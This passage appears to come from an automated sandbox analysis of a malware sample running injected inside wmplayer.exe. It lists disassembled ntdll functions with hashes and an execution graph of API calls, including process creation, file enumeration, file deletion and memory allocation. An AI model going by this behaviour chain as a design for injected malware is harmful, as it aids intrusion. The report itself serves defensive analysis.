                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bfc6efed384462c22cf565ea872b90a62ab57eb7b4be60d95294502ebec1f03
                                              • Instruction ID: 97cc3d155b720b9ee856f609be31b24a80a4cc01350119b744ba0a16c9abb35e
                                              • Opcode Fuzzy Hash: 2bfc6efed384462c22cf565ea872b90a62ab57eb7b4be60d95294502ebec1f03
                                              • Instruction Fuzzy Hash: 2D90023525141802D141B15C4445606040997D0241F96C012A0424954E8B558B56AA61
                                              Function 03312DD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a157e6b1a31bcaeea8f8b5beb1bd3b1879dd41ac3d1a5f54d345e744c08a96e
                                              • Instruction ID: ad34d35e613f401a593244d8f8a3214f4d494bef2d24baab6d4c3bc1d684a463
                                              • Opcode Fuzzy Hash: 8a157e6b1a31bcaeea8f8b5beb1bd3b1879dd41ac3d1a5f54d345e744c08a96e
                                              • Instruction Fuzzy Hash: BD900235252455525545F15C4445507440697E0241796C012A1414D50C8A269956D621
                                              Function 03312C60 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffd2a208709aba8b39652e203ff73fb23290a84ce84a961cad41e627977380f2
                                              • Instruction ID: ebe40ba73dbbec60b5026743d8d82c600fb495bdb0931a2b5853117adbb2321e
                                              • Opcode Fuzzy Hash: ffd2a208709aba8b39652e203ff73fb23290a84ce84a961cad41e627977380f2
                                              • Instruction Fuzzy Hash: 2B90023521141C42D100B15C4445B46040587E0301F56C016A0124A54D8B15C9517521
                                              Function 03312CA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7895affc6a79741cfecfa76ddf9682ac6596254cff2cbfe9767c309195d5e06d
                                              • Instruction ID: aa2f8bafae728a6fc797746c9b42ecac6357a8a4ebadf57f06ed5e10f5786534
                                              • Opcode Fuzzy Hash: 7895affc6a79741cfecfa76ddf9682ac6596254cff2cbfe9767c309195d5e06d
                                              • Instruction Fuzzy Hash: 7490023521141802D100B59C5449646040587E0301F56D011A5024955ECB6589916131
                                              Function 03312CF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92e3e640a0faf40f40f2996714df09a3273c47df90ccd4c671acce65e327a8eb
                                              • Instruction ID: c5f80afb8050d6aa55f8546443e75c68df4f853b36bc019471f66a71272b519d
                                              • Opcode Fuzzy Hash: 92e3e640a0faf40f40f2996714df09a3273c47df90ccd4c671acce65e327a8eb
                                              • Instruction Fuzzy Hash: 5390023521141803D100B15C5549707040587D0201F56D411A0424958DDB5689516121
                                              Function 03312CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf479f2c5b85384d20d3b77fc3a18e3438bccedcc5330c04cc8a4c6b294d7188
                                              • Instruction ID: e5c9f7868988e614e98c3c537be9e3c1d5b155a2de412128d881d1464c1b08ae
                                              • Opcode Fuzzy Hash: cf479f2c5b85384d20d3b77fc3a18e3438bccedcc5330c04cc8a4c6b294d7188
                                              • Instruction Fuzzy Hash: 4290023561541802D140B15C5459706041587D0201F56D011A0024954DCB598B5566A1
                                              Function 03312C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: a3912f6eabf3e9f4fdbdda3e4eecf2610fc1af033c4c4bd72e997a2ed7a9adf1
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Function 03312890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: c4d3f4eb32d26668641755b6befa9baaa582b3999cf4601b5379764c74b876bf
                                              • Instruction ID: c2e9ac421ee9cd1fbf513f995c16e44ba24c66188d422d574823d3b779782a7c
                                              • Opcode Fuzzy Hash: c4d3f4eb32d26668641755b6befa9baaa582b3999cf4601b5379764c74b876bf
                                              • Instruction Fuzzy Hash: 5851E4B6A00256BFCB14DB9C8DC097FFBFCBB082017148669E4A5D7641D274EE648BE0
                                              Function 03307630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule
                                              Strings
                                              • Execute=1, xrefs: 03344713
                                              • ExecuteOptions, xrefs: 033446A0
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03344655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03344787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03344742
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033446FC
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03344725
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 112dfdc93583fefcd6a36f9f6a766403674710ae4eb8565639fa87214534ca93
                                              • Instruction ID: 3d5c6848753e828546e25bbd079a53dabef8bf33f88f2a421ec6b0d1f12cd352
                                              • Opcode Fuzzy Hash: 112dfdc93583fefcd6a36f9f6a766403674710ae4eb8565639fa87214534ca93
                                              • Instruction Fuzzy Hash: 8B51F675A0031DAADB10EBA8DCE5FBE77BCAF04740F1400A9E506AB1D1EB71BA458F51
                                              Function 0331B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 140881307ccdcd4b79a09819e93112d6c63ee97876ab0c106e44264c70df3623
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: 4F81DC74E112499EDF2CCE68CCD17BEFBA6AF54760F1C425AE861A7390C77488608B60
                                              Function 032FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033402E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033402BD
                                              • RTL: Re-Waiting, xrefs: 0334031E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 39a1abb9c6f065bd534396675f882a705c223842f5e76d5ae942a73f0b487762
                                              • Instruction ID: ca0557a1c4e5b9a1bf8994f53ff66febf884fa648d4a775e26358be71a04d691
                                              • Opcode Fuzzy Hash: 39a1abb9c6f065bd534396675f882a705c223842f5e76d5ae942a73f0b487762
                                              • Instruction Fuzzy Hash: 0DE1C174624741AFD725CF28C984B2AF7E4BF84714F180A6DF6A58B2E1D774E884CB42
                                              Function 0330BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Resource at %p, xrefs: 03347B8E
                                              • RTL: Re-Waiting, xrefs: 03347BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03347B7F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: f369494cd035a6c83a158ebcfed74ca91547cf06ad041192e732cd7b7751ca81
                                              • Instruction ID: 4bb459e92fde34e1d5f8a86607486e3d5121ae368b97ffc64721a51035b33b6a
                                              • Opcode Fuzzy Hash: f369494cd035a6c83a158ebcfed74ca91547cf06ad041192e732cd7b7751ca81
                                              • Instruction Fuzzy Hash: BF41EF357017029FC724DE29CC90B6AF7E9EF89710F040A1DF9AA9B680DB30E8458B91
                                              Function 0330B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0334728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 033472A3
                                              • RTL: Re-Waiting, xrefs: 033472C1
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03347294
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: 1c5a2479acbda30dcd2f0409d469ba395fd03bf4b7368382ac97af04f77afb75
                                              • Instruction ID: 8ca7397922b2f2c461f5577ca2ed52209e37b1e56add48459b2cdf3e464df10d
                                              • Opcode Fuzzy Hash: 1c5a2479acbda30dcd2f0409d469ba395fd03bf4b7368382ac97af04f77afb75
                                              • Instruction Fuzzy Hash: 0441DF75B00206ABC720DF25CCC1F6AB7E9FB84710F140619F865AB680DB21F8928BD1
                                              Function 03317D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: af790ecc4eb3edbf8acecdeab689f1156737f4ceea779c4050360fd6fb57bad6
                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: FC91B275E0021A9BDF2CDE69CCC0ABFB7E5AF44320F1C461AE865EB2D0D73499618760
                                              Function 032D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              • Opcode ID: d3b1dcfb0845bb5b11f96647d55c60c058c7c8a1c4d2cd154e00ac40a5f663ef
                                              • Instruction ID: 50c3e07082910edb150c77470a3b041204d8f13524b0b20c99dc8e4f48eea3f3
                                              • Opcode Fuzzy Hash: d3b1dcfb0845bb5b11f96647d55c60c058c7c8a1c4d2cd154e00ac40a5f663ef
                                              • Instruction Fuzzy Hash: D0811A75D102699BDB21DB54CC45BEEB7B8AF09710F0485EAE919B7280D7709EC4CFA0
                                              Function 0335CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0335CFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              • API String ID: 4062629308-3101775584
                                              • Opcode ID: c2db6ab95820b7ecaf7f80e84a835d62561564b93a6521bb1c31df576f9d21b7
                                              • Instruction ID: 53e10fe1e8fe85e20ac5d93e32196583b570d8a4e9b5c54afbf7c74f1c9e4bb6
                                              • Opcode Fuzzy Hash: c2db6ab95820b7ecaf7f80e84a835d62561564b93a6521bb1c31df576f9d21b7
                                              • Instruction Fuzzy Hash: 44419DBA910314DFCB21DF94C880AADBBB8EF44710F04452AF915DB254D778D841CB60

                                              Execution Graph

                                              Execution Coverage:3%
                                              Dynamic/Decrypted Code Coverage:4%
                                              Signature Coverage:1.4%
                                              Total number of Nodes:496
                                              Total number of Limit Nodes:75
                                              execution_graph 85484 2e16de0 85485 2e16e52 85484->85485 85486 2e16df8 85484->85486 85486->85485 85488 2e1aa00 85486->85488 85489 2e1aa26 85488->85489 85490 2e1ac45 85489->85490 85515 2e28230 85489->85515 85490->85485 85492 2e1aa9c 85492->85490 85518 2e2af90 85492->85518 85494 2e1aab8 85494->85490 85495 2e1ab89 85494->85495 85524 2e274d0 85494->85524 85497 2e154b0 LdrInitializeThunk 85495->85497 85499 2e1aba8 85495->85499 85497->85499 85503 2e1ac2d 85499->85503 85535 2e270a0 85499->85535 85500 2e1ab71 85531 2e17960 85500->85531 85501 2e1ab4f 85550 2e23690 LdrInitializeThunk 85501->85550 85502 2e1ab1d 85502->85490 85502->85500 85502->85501 85528 2e154b0 85502->85528 85506 2e17960 LdrInitializeThunk 85503->85506 85510 2e1ac3b 85506->85510 85510->85485 85511 2e1ac04 85540 2e27140 85511->85540 85513 2e1ac1e 85545 2e27280 85513->85545 85516 2e2824d 85515->85516 85517 2e2825e CreateProcessInternalW 85516->85517 85517->85492 85519 2e2af00 85518->85519 85522 2e2af5d 85519->85522 85551 2e29e60 85519->85551 85521 2e2af3a 85554 2e29d80 85521->85554 85522->85494 85525 2e274ed 85524->85525 85563 35b2c0a 85525->85563 85526 2e1ab14 85526->85495 85526->85502 85529 2e154ee 85528->85529 85566 2e27690 85528->85566 85529->85501 85532 2e17973 85531->85532 85572 2e273e0 85532->85572 85534 2e1799e 85534->85485 85536 2e2710f 85535->85536 85537 2e270c1 85535->85537 85578 35b39b0 LdrInitializeThunk 85536->85578 85537->85511 85538 2e27134 85538->85511 85541 2e271b2 85540->85541 85542 2e27164 85540->85542 85579 35b4340 LdrInitializeThunk 85541->85579 85542->85513 85543 2e271d7 85543->85513 85546 2e272a1 85545->85546 85547 2e272ef 85545->85547 85546->85503 85580 35b2fb0 LdrInitializeThunk 85547->85580 85548 2e27314 85548->85503 85550->85500 85557 2e28150 85551->85557 85553 2e29e7b 85553->85521 85560 2e281a0 85554->85560 85556 2e29d99 85556->85522 85558 2e2816d 85557->85558 85559 2e2817e RtlAllocateHeap 85558->85559 85559->85553 85561 2e281ba 85560->85561 85562 2e281cb RtlFreeHeap 85561->85562 85562->85556 85564 35b2c1f LdrInitializeThunk 85563->85564 85565 35b2c11 85563->85565 85564->85526 85565->85526 85567 2e27732 85566->85567 85569 2e276b4 85566->85569 85571 35b2d10 LdrInitializeThunk 85567->85571 85568 2e27777 85568->85529 85569->85529 85571->85568 85573 2e27453 85572->85573 85574 2e27404 85572->85574 85577 35b2dd0 LdrInitializeThunk 85573->85577 85574->85534 85575 2e27478 85575->85534 85577->85575 85578->85538 85579->85543 85580->85548 85734 2e108a0 85735 2e108b9 85734->85735 85736 2e14280 LdrLoadDll 85735->85736 85737 2e108d7 85736->85737 85738 2e10910 PostThreadMessageW 85737->85738 85739 2e10923 85737->85739 85738->85739 85740 2e1bca0 85742 2e1bcc9 85740->85742 85741 2e1bdcd 85742->85741 85743 2e1bd73 FindFirstFileW 85742->85743 85743->85741 85744 2e1bd8e 85743->85744 85745 2e1bdb4 FindNextFileW 85744->85745 85745->85744 85746 2e1bdc6 FindClose 85745->85746 85746->85741 85747 2e16c20 85748 2e16c3c 85747->85748 85750 2e16c8f 85747->85750 85749 2e27e40 NtClose 85748->85749 85748->85750 85751 2e16c57 85749->85751 85756 2e16db2 85750->85756 85757 2e16030 85750->85757 85754 2e16030 3 API calls 85751->85754 85753 2e16d92 85753->85756 85772 2e16200 85753->85772 85754->85750 85758 2e1605c 85757->85758 85759 2e15eb0 LdrInitializeThunk 85758->85759 85760 2e160a6 85759->85760 85761 2e16148 85760->85761 85762 2e27930 LdrInitializeThunk 85760->85762 85761->85753 85765 2e160cd 85762->85765 85763 2e1613f 85764 2e27e40 NtClose 85763->85764 85764->85761 85765->85763 85766 2e27930 LdrInitializeThunk 85765->85766 85767 2e16154 85765->85767 85766->85765 85768 2e27e40 NtClose 85767->85768 85769 2e1615d 85768->85769 85770 2e15eb0 LdrInitializeThunk 85769->85770 85771 2e1617a 85769->85771 85770->85771 85771->85753 85773 2e16225 85772->85773 85774 2e15da0 2 API calls 85773->85774 85776 2e16252 85773->85776 85774->85776 85775 2e164ee 85775->85756 85776->85775 85777 2e15eb0 LdrInitializeThunk 85776->85777 85785 2e16455 85776->85785 85779 2e1637e 85777->85779 85778 2e15eb0 LdrInitializeThunk 85780 2e164a3 85778->85780 85781 2e16389 85779->85781 85779->85785 85798 2e15f60 85780->85798 85783 2e27e40 NtClose 85781->85783 85787 2e16393 85783->85787 85784 2e27e40 NtClose 85784->85775 85785->85778 85786 2e164b3 85786->85784 85788 2e15eb0 LdrInitializeThunk 85787->85788 85789 2e163de 85788->85789 85790 2e27e40 NtClose 85789->85790 85791 2e163e8 85790->85791 85792 2e15eb0 LdrInitializeThunk 85791->85792 85793 2e16433 85792->85793 85794 2e15f60 LdrInitializeThunk 85793->85794 85795 2e16443 85794->85795 85796 2e27e40 NtClose 85795->85796 85797 2e1644d 85796->85797 85797->85756 85799 2e15f86 85798->85799 85802 2e27820 85799->85802 85803 2e2783d 85802->85803 85806 35b3090 LdrInitializeThunk 85803->85806 85804 2e16014 85804->85786 85806->85804 85581 2e20fe0 85585 2e20fef 85581->85585 85582 2e21036 85583 2e29d80 RtlFreeHeap 85582->85583 85584 2e21046 85583->85584 85585->85582 85586 2e21074 85585->85586 85588 2e21079 85585->85588 85587 2e29d80 RtlFreeHeap 85586->85587 85587->85588 85807 2e27320 85808 2e273a1 85807->85808 85809 2e27341 85807->85809 85812 35b2ee0 LdrInitializeThunk 85808->85812 85810 2e273d2 85812->85810 85589 35b2ad0 LdrInitializeThunk 85813 2e12eac 85818 2e175e0 85813->85818 85815 2e12ed1 85817 2e27e40 NtClose 85817->85815 85819 2e175fa 85818->85819 85823 2e12ebc 85818->85823 85824 2e27570 85819->85824 85822 2e27e40 NtClose 85822->85823 85823->85815 85823->85817 85825 2e2758d 85824->85825 85828 35b35c0 LdrInitializeThunk 85825->85828 85826 2e176ca 85826->85822 85828->85826 85829 2e096b0 85831 2e096bf 85829->85831 85830 2e09700 85831->85830 85832 2e096ed CreateThread 85831->85832 85590 2e1ed70 85591 2e1edd4 85590->85591 85619 2e15da0 85591->85619 85593 2e1ef04 85594 2e1eefd 85594->85593 85626 2e15eb0 85594->85626 85596 2e1f0a3 85597 2e1ef80 85597->85596 85598 2e1f0b2 85597->85598 85630 2e1eb50 85597->85630 85600 2e27e40 NtClose 85598->85600 85601 2e1f0bc 85600->85601 85602 2e1efb5 85602->85598 85603 2e1efc0 85602->85603 85604 2e29e60 RtlAllocateHeap 85603->85604 85605 2e1efe9 85604->85605 85606 2e1eff2 85605->85606 85607 2e1f008 85605->85607 85608 2e27e40 NtClose 85606->85608 85639 2e1ea40 CoInitialize 85607->85639 85610 2e1effc 85608->85610 85611 2e1f016 85641 2e27930 85611->85641 85613 2e1f092 85645 2e27e40 85613->85645 85615 2e1f09c 85616 2e29d80 RtlFreeHeap 85615->85616 85616->85596 85617 2e1f034 85617->85613 85618 2e27930 LdrInitializeThunk 85617->85618 85618->85617 85621 2e15dd3 85619->85621 85620 2e15df7 85620->85594 85621->85620 85648 2e279e0 85621->85648 85623 2e27e40 NtClose 85625 2e15e9c 85623->85625 85624 2e15e1a 85624->85620 85624->85623 85625->85594 85627 2e15ed5 85626->85627 85653 2e277c0 85627->85653 85631 2e1eb6c 85630->85631 85658 2e14280 85631->85658 85633 2e1eb93 85633->85602 85634 2e1eb8a 85634->85633 85635 2e14280 LdrLoadDll 85634->85635 85636 2e1ec5e 85635->85636 85637 2e14280 LdrLoadDll 85636->85637 85638 2e1ecb8 85636->85638 85637->85638 85638->85602 85640 2e1eaa5 85639->85640 85640->85611 85642 2e2794d 85641->85642 85662 35b2ba0 LdrInitializeThunk 85642->85662 85643 2e2797d 85643->85617 85646 2e27e5d 85645->85646 85647 2e27e6e NtClose 85646->85647 85647->85615 85649 2e279fa 85648->85649 85652 35b2ca0 LdrInitializeThunk 85649->85652 85650 2e27a26 85650->85624 85652->85650 85654 2e277dd 85653->85654 85657 35b2c60 LdrInitializeThunk 85654->85657 85655 2e15f49 85655->85597 85657->85655 85659 2e142a4 85658->85659 85660 2e142e0 LdrLoadDll 85659->85660 85661 2e142ab 85659->85661 85660->85661 85661->85634 85662->85643 85833 2e15530 85834 2e17960 LdrInitializeThunk 85833->85834 85835 2e15560 85834->85835 85837 2e1558c 85835->85837 85838 2e178e0 85835->85838 85839 2e17924 85838->85839 85840 2e17945 85839->85840 85845 2e271e0 85839->85845 85840->85835 85842 2e17935 85843 2e17951 85842->85843 85844 2e27e40 NtClose 85842->85844 85843->85835 85844->85840 85846 2e27252 85845->85846 85847 2e27204 85845->85847 85850 35b4650 LdrInitializeThunk 85846->85850 85847->85842 85848 2e27277 85848->85842 85850->85848 85668 2e27b70 85669 2e27c1c 85668->85669 85671 2e27b98 85668->85671 85670 2e27c32 NtCreateFile 85669->85670 85851 2e27db0 85852 2e27e19 85851->85852 85854 2e27dd1 85851->85854 85853 2e27e2f NtDeleteFile 85852->85853 85672 2e19474 85673 2e1942f 85672->85673 85676 2e1947e 85672->85676 85674 2e19431 85673->85674 85675 2e29d80 RtlFreeHeap 85673->85675 85675->85674 85855 2e15637 85856 2e155e2 85855->85856 85857 2e1563a 85855->85857 85858 2e274d0 LdrInitializeThunk 85856->85858 85859 2e155f6 85858->85859 85862 2e27ed0 85859->85862 85861 2e1560b 85863 2e27f51 85862->85863 85864 2e27ef1 85862->85864 85867 35b2e80 LdrInitializeThunk 85863->85867 85864->85861 85865 2e27f82 85865->85861 85867->85865 85868 2e1803e 85870 2e18043 85868->85870 85869 2e18002 85870->85869 85872 2e16a70 LdrInitializeThunk LdrInitializeThunk 85870->85872 85872->85869 85873 2e0b280 85874 2e29cf0 NtAllocateVirtualMemory 85873->85874 85875 2e0c8f1 85874->85875 85876 2e1a500 85881 2e1a230 85876->85881 85878 2e1a50d 85895 2e19ed0 85878->85895 85880 2e1a529 85882 2e1a255 85881->85882 85906 2e17bb0 85882->85906 85885 2e1a392 85885->85878 85887 2e1a3a9 85887->85878 85888 2e1a3a0 85888->85887 85890 2e1a491 85888->85890 85921 2e19930 85888->85921 85892 2e1a4e9 85890->85892 85930 2e19c90 85890->85930 85893 2e29d80 RtlFreeHeap 85892->85893 85894 2e1a4f0 85893->85894 85894->85878 85896 2e19ee6 85895->85896 85903 2e19ef1 85895->85903 85897 2e29e60 RtlAllocateHeap 85896->85897 85897->85903 85898 2e19f07 85898->85880 85899 2e17bb0 GetFileAttributesW 85899->85903 85900 2e1a1fe 85901 2e1a217 85900->85901 85902 2e29d80 RtlFreeHeap 85900->85902 85901->85880 85902->85901 85903->85898 85903->85899 85903->85900 85904 2e19930 RtlFreeHeap 85903->85904 85905 2e19c90 RtlFreeHeap 85903->85905 85904->85903 85905->85903 85907 2e17bd1 85906->85907 85908 2e17bd8 GetFileAttributesW 85907->85908 85909 2e17be3 85907->85909 85908->85909 85909->85885 85910 2e222b0 85909->85910 85911 2e222be 85910->85911 85912 2e222c5 85910->85912 85911->85888 85913 2e14280 LdrLoadDll 85912->85913 85914 2e222fa 85913->85914 85915 2e22309 85914->85915 85934 2e21d80 LdrLoadDll 85914->85934 85917 2e29e60 RtlAllocateHeap 85915->85917 85920 2e224a1 85915->85920 85919 2e22322 85917->85919 85918 2e29d80 RtlFreeHeap 85918->85920 85919->85918 85919->85920 85920->85888 85922 2e19956 85921->85922 85935 2e1d170 85922->85935 85924 2e199bd 85926 2e19b40 85924->85926 85928 2e199db 85924->85928 85925 2e19b25 85925->85888 85926->85925 85927 2e197f0 RtlFreeHeap 85926->85927 85927->85926 85928->85925 85940 2e197f0 85928->85940 85931 2e19cb6 85930->85931 85932 2e1d170 RtlFreeHeap 85931->85932 85933 2e19d32 85932->85933 85933->85890 85934->85915 85937 2e1d186 85935->85937 85936 2e1d193 85936->85924 85937->85936 85938 2e29d80 RtlFreeHeap 85937->85938 85939 2e1d1cc 85938->85939 85939->85924 85941 2e197f8 85940->85941 85944 2e1d1e0 85941->85944 85943 2e1990c 85943->85928 85945 2e1d204 85944->85945 85946 2e1d29c 85945->85946 85947 2e29d80 RtlFreeHeap 85945->85947 85946->85943 85947->85946 85948 2e27480 85949 2e2749d 85948->85949 85952 35b2df0 LdrInitializeThunk 85949->85952 85950 2e274c5 85952->85950 85963 2e09710 85966 